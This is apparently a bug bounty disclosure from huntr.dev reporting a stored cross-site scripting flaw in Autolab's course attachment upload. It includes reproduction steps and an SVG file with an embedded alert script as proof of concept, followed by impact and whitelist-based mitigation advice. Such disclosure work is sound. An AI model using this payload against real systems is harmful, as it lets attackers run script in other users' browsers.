Cross-site Scripting (XSS) - Stored

2022-03-0214:30:50

abhiabhi2306

www.huntr.dev

cross-site scripting

autolab

stored

file upload

xss attack

impact

mitigation

file type checking

white-list approach

bug bounty

EPSS

0.001

Percentile

21.4%

JSON

Description

Autolab is vulnerable to stored cross-site-scripting in the upload files functionality in courses feature, this can be used to execute XSS attack against the victim who is a student/teacher.

Steps to Reproduce (PoC)

login to autolab
go to https://DOMAIN/courses/COURSENAME/attachments/new
upload the below file as something.svg

&lt;?xml version="1.0" standalone="no"?&gt;
&lt;!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"&gt;

&lt;svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"&gt;
   &lt;rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /&gt;
   &lt;script type="text/javascript"&gt;
      alert("xssed");
   &lt;/script&gt;

go to https://DOMAIN/courses/COURSENAME/attachments
view the file you just uploaded, you’ll get the alert fn executed.

Impact

This can be used to perform XSS attacks on other users as other users such as students/teachers can also view attachments, xss can be weaponized to trick them to do unwanted actions by executing malicious javascript at their end.

Proof

https://prnt.sc/LGy-cYXA37sK

Fix / Mitigation

Check file types while uploading, and allow only corresponding types, It is recommended to have a whitelist based approach to check the file type in server-side and to reject/accept the file while uploading.